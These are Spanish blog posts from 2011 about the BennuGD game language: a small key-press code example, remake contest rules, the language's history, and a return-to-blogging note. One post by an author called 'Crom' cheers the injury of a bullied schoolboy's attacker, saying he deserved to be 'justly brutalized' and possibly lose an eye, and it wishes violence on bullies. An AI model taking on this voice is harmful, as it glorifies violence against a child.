end

Analicemos:
Después de toda la parafernalia pertinente a la declaracion de proceso y etceteras vendría (en este caso) un loop, seguido de la comprobacion de pulsar una tecla; en este caso, la tecla 'p'.

if (key(_p))

Ahora llega la ejecución:

graph = 2; //Cambiamos de grafico para mostrar la bombilla encendida

Si no:

else
graph = 1; //El grafico es el de la bombilla apagada
end


Este ejemplo se puede aplicar, principalmente, a movimientos del protagonista de nuestro juego (arriba, abajo, izda. y dcha.); para que, cuando dejemos de pulsar, se pare.

Descárgate el ejemplo aquí.
Fuente: http://forum.bennugd.org/index.php?topic=2133.msg38296#msg38296
Autor: Futublock

martes, 15 de marzo de 2011

Concurso de remakes Div-like

Un internauta llamado FreeYourMind ha publicado las bases de un concurso de videojuegos Div-like. Es una oportunidad única para participar en un concurso de sencilla temática y premios sabrosos.

Las bases en: http://gecasoft.no.sapo.pt/

Extracto de las bases:
Concurso de programación 'Thunder Hoop Remake'

Bienvenido al concurso que intentará hacer las delicias de los amantes del legendario arcade de Gaelco 'Thunder Hoop'.

Si tu pasión son los juegos retro, te encantan los remakes y la programación de juegos, tienes la oportunidad de conseguir una portatil open source 'Caanoo'.

Para ello sólo te tienes que divertir haciendo tu remake de 'Thunder Hoop' y encima poder ganar una consola por el esfuerzo.

Bases del Concurso:

1 - Lenguaje y Herramientas:
- Tiene que ser programado en un DIV-LIKE a elegir entre los siguientes:
a) BennuGD (http://www.bennugd.org/)
b) Fenix (http://fenix.divsite.net/)
c) Gemix (http://gemixstudio.com/)
- Se puede hacer para cualquier plataforma (consola o SO) que soporte el lenguaje.
- Se pueden utilizar modulos externos y proprietarios si el lenguaje lo permite.
- Se puede utilizar cualquier tipo de herramienta o tool auxiliar a la misma, necesarias para la creación de gráficos, modelos, sonidos, etc.
2 - Tipo de juego:
El objetivo es tener como minímo un remake de 'Thunder Hoop', pero por si algun motivo prefieres hacer el remake de otro clasico, tambien podras hacerlo y concursar de igual forma.

Sólo se aceptarán Remakes de los siguientes juegos (versión Arcade):
Genéro Plataformas/Disparos (Horizontal):
- Thunder Hoop (http://www.arcadiabay.de/images/games/thunder_hoop.jpg)
- Toki (http://www.gameclassification.com/files/games/Toki.png)
- Shadow Dancer (http://www.nostalgia80.com/wp-content/uploads/2010/09/sd2.jpg)
- Ken-Go (Lightning Sword) (http://arcade.svatopluk.com/irem/ken-go/ken-go_04.png)
Genéro Shooter (Horizontal):
- Aero Blaster (http://www.gameclassification.com/files/games/Air_Buster_Arcade.png)
- Thunder Cross II (http://www.sega-16.com/Features/Lost%20in%20the%20Arcade/Thunder_Cross_II.png)
- Thunder Blade (http://www.hardcoregaming101.net/thunderblade/thunderblade-2.png)
- Insector X (http://www.arcade-museum.com/images/118/118124212330.png)
Los shooter deberan respetar la dirección del scroll horizontal del original (o el efecto modo 7 en el caso de Thunder Blade).

Si se elige 'Insector X' se tendrá en cuenta que es un remake más sencillo de hacer, con lo cual se tendrá en cuenta que tendrá de ser un Remake un poco mas trabajado o cercano en contenidos al original.

NOTA sobre los remakes:

Se puede optar por 2 caminos, el programador elige el que quiera:
1 - Hacer un remake lo mas fiel posible al original. Se valorara el grado de aproximación obtenido en todos sus apartados.

2 - Hacer un juego baseado en el original, con detalles o fases nuevas como si fuera una continuación o una version especial del mismo (por ejemplo si comparamos una fase de Sonic 2 con una de Sonic 1, este tiene fases nuevas o movimientos nuevos, pero si lo miras a la primera podrias decir que eran el mismo juego pero una fase distinta).

Puedes optar por este camino, si quieres mantener el espirito del original pero aportando detalhes nuevos y originales, o sea, si prefieres hacer un remake 'a tu manera'.
3 - Condiciones:

Cada participante puede presentar tantos juegos/generos como quiera.

Pueden basearse o utilizar parte de código fuente ya publicado en otros juegos, si este sirve de ayuda para la creación del mismo. Eso si, el juego tendrá que demostrar que no se basa en una simple adaptación con gráficos nuevos de algo existente, o sea, tendrá que quedar fiel al juego elegido para Remake (demontrar que hay trabajo en el).

Los juegos no podrán ser publicados hasta que el concurso haya finalizado, lo unico que se permite es poder enseñarse alguna captura del mismo en algun foro de avances o ayuda. Si un juego es publicado antes, será descalificado inmediatamente.

Los juegos de menos de 10 MB podrán enviarse por e-mail a geca_portugal@yahoo.com.
Para los juegos de más de 10 MB, deberá proporcionarse un enlace de descarga del mismo en el email.

Junto con el juego se deben incluir todos los recursos utilizados por el mismo así como todo el código fuente, scripts de configuración y compilación, etc. O sea, todo lo necesario para la compilación y correcto funcionamiento del mismo.

Si utiliza algun modulo externo o dependencia que se haya programada exclusivamente para el mismo, este tambien deberá venir con su código fuente en el lenguaje que haya sido creado.
El código fuente no será evaluado, sólo será tenido en cuenta para comprobar que ha existido un minimo de esfuerzo al crear el remake, y que este no es un mero copy/paste de otros códigos.
En ningun caso el código será distruibuido a terceros salvo qu el autor lo declaré open source o así lo entienda.

El autor tendrá todos los derechos de su obra, podrá despúes distribuirlo bajo la licencia que entienda (open source, código cerrado, o lo que sea).

También se debe incluir un archivo "info.txt" con la siguiente información:
- Nombre del trabajo presentado.
- Descripción del juego y breve manual de uso.
- Nick / Nombre del programador.
- Dependencias o permisos de terceros (si existe algo utilizado bajo el consentimiento de terceras pesonas).
- E-mail de contacto.


Se evaluarán las siguientes categorias:

- Fidelidad y/o inovacíon en relación al original segun el tipo de remake.
(Sobretodo se evaluará la sensación que transmite comparado con el original)

- Jugabilidad/adición

- Rendimiento/robustez en su ejecución

- Gráficos/Animaciones (calidad de ripeo/animaciones o calidad de los gráficos originales/adaptados)

- Musica/Sonidos FX (calidad de ripeo o calidad del sonido original/adaptado)

(Leer más)

Me presento y me opongo

Me llaman Crom y me encanta tocar las narices. Las de arriba, no las de abajo.

También soy friki, no del tipo Carmen de Mairena o como los idiotas que aún van a Gran Hermano con la feliz idea de ser famosos más de 2 días. Lo mío son los comics, los videojuegos, los juegos de rol, las pelis, las novelas, las camisetas, los gayumbos, los DIU (aunque los uso a modo de frisbi), etc. No, el manga y el anime no me van, no me gustan las cosas de besasushis (que es como con cariño cariño llamo a gente como mi buen amigo Yawin).

Por cierto, es a él a quien tendréis que mandar vuestras quejas por mi presencia aquí. Necesitaba reclutas para su blog y me presenté, con el teclado afilado y los ojos brillantes, como los de una niña de Ohio ante la perspectiva de vaciar el tambor de su colt de Hello Kitty sobre un mangante que quiere hacerse con su colección de cromos de Mi pequeño pony. Bueno, Su pequeño pony, yo soy más de Pokemon.

Y ahora empiezo mi andadura por el blog este (¿Cómo se llamaba? Que más da, desde ahora será EL BLOG, todo con mayúsculas).

Este es mi primer regalo para todos vosotros, oh lectores de EL BLOG: un video, si, un jodido video “¡Que recurso más socorrido para hacer tu primera entrada, maldito vago de los cojones, dame entretenimiento genuino” dirán algunos.

Me la suda.

¿Quién es el prota del video? Un chaval australiano llamado Casey Heynes a quienes sus compañeros (por llamarlos de alguna manera que implique delatar la profesión de sus amorosas madres) y vecinos (tres cuartos de lo mismo) se han pasado los últimos 5 años haciéndole la vida imposible. Hasta que al fin el chico les hizo frente el 14 de marzo de 2011, miradlo porque no tiene desperdicio.

http://www.viddler.com/explore/MercWithMouth/videos/27/

El niño idiota que ha sido justamente brutalizado igual pierde un ojo y es probable que tenga problemas en cuello y pecho. Que se joda.

Y si tú eres el tipo de persona que ha gozado haciéndole la vida imposible a otro chaval…jódete, y ojala Casey aparezca y te destroce como al montón de residuos anales que eres.

lunes, 14 de marzo de 2011

La historia de BennuGD

En la década de los 90 el entonces estudiante Daniel Navarro Medrano creó como proyecto final de carrera una herramienta orientada a la creación de videojuegos de 32 bits bajo MS-DOS. El nuevo lenguaje, de nombre DIV Games Studio, combinaba características de C y Pascal con un entorno completo que permitía la creación y edición de todos los aspectos de los proyectos: programación, edición gráfica y sonora y un largo etc.

Fénix, inicialmente bajo el nombre DIVC y de naturaleza GNU y gratuita, apareció de la mano de Jose Luis Cebrián como una herramienta capaz de compilar y ejecutar esos juegos en GNU/Linux. El nombre fue cambiado en la versión 0.6 del compilador, que además introducía otras mejoras, como la aparición de un fichero intermedio entre el entorno de compilación y el entorno de ejecución. Ya no era necesario distribuir el código fuente de un juego para poder jugar a los juegos. La ventaja principal de esa práctica (similar en concepto a Java) era clara, compilar en una plataforma y ejecutar en muchas. En la versión 0.71 el proyecto quedó parado, lo que dio lugar a múltiples versiones derivadas que corregían fallos o añadían nuevas características.

La versión oficial de Fénix fue retomada por Slàinte en el año 2002, viejo conocido de la comunidad DIV por ser el webmaster de una de las páginas web más importantes para la comunidad, quien continuó el proyecto bajo el nombre de “Fénix-Proyecto 1.0” al que pronto se reincorporaría su creador y cuyo primer objetivo era limpiar el compilador de errores y estabilizarlo. Desde entonces el compilador ha sufrido numerosos cambios y mejoras, dejando
de un lado la compatibilidad con el lenguaje DIV, el desarrollo del cual quedó paralizado hace tiempo en su versión 2 desde la quiebra de la empresa que lo comercializaba, Hammer Technologies. (De hecho, DIV2 sólo es compatible con Ms-Dos y Windows 95/98).

Tras un periodo de relativa inactividad en donde Fénix se había estancado en su versión 0.84/0.84a, a mediados del 2006, Juan (a.k.a. "SplinterGU") retomó con fuerza el desarrollo de nuevas versiones del compilador/intérprete, incorporándole muchas mejoras en rendimiento y velocidad, añadiendo funciones nuevas y corrigiendo bugs crónicos, y modularizando por completo todo el entorno (una demanda mucho tiempo reclamada), hasta llegar a la versión 0.92a.

No obstante, ciertas desaveniencias con determinados miembros de la comunidad hicieron que Juan se decidiera por abandonar el desarrollo oficial de Fénix y crear un fork (una variante independiente) a partir del código de Fénix llamado Bennu. Bennu es el nombre de un dios egipcio, cuya apariencia física es la de una garza real llevando sobre la cabeza la corona del Alto Egipto. Este dios es el de la regeneración (cómo Fénix), debido al carácter de ave migratoria que reaparece, que renace, que se renueva periódicamente.

A partir de 2007, poco a poco se ha ido construyendo una nueva comunidad alrededor de este nuevo lenguaje renacido. Hoy en día el foro de Bennu (http://forum.bennugd.org) es un lugar muy activo lleno de gente que intercambia información, trucos y experiencias sobre este lenguaje y que están encantados de echar una mano. Además, la comunidad ofrece muchos otros recursos para el programador: desde a la documentación online del lenguaje, en forma de wiki (http://wiki.bennugd.org) -donde se pretende recoger la descripción de todas las funciones, variables, características sintácticas y entresijos del lenguaje- hasta diferentes proyectos, librerías y aplicaciones software que facilitan mucho el día a día a la hora de programar.

Después de tanto tiempo...

Es cierto, llevo muuuucho tiempo sin actualizar este blog. No tengo excusa. Soy un vago demente que busca incansablemente una forma de entretenerse (incansablemente, porque no me canso). La verdad es que cada dos o tres días me acuerdo de este blog, pero por causas ajenas a mi voluntad, mi subconsciente me ordena que no lo haga, que no postee otra vez.

Sin embargo, he decidido volver a intentarlo por enésima vez.

¡Frikis en apuros y otras historias comes again!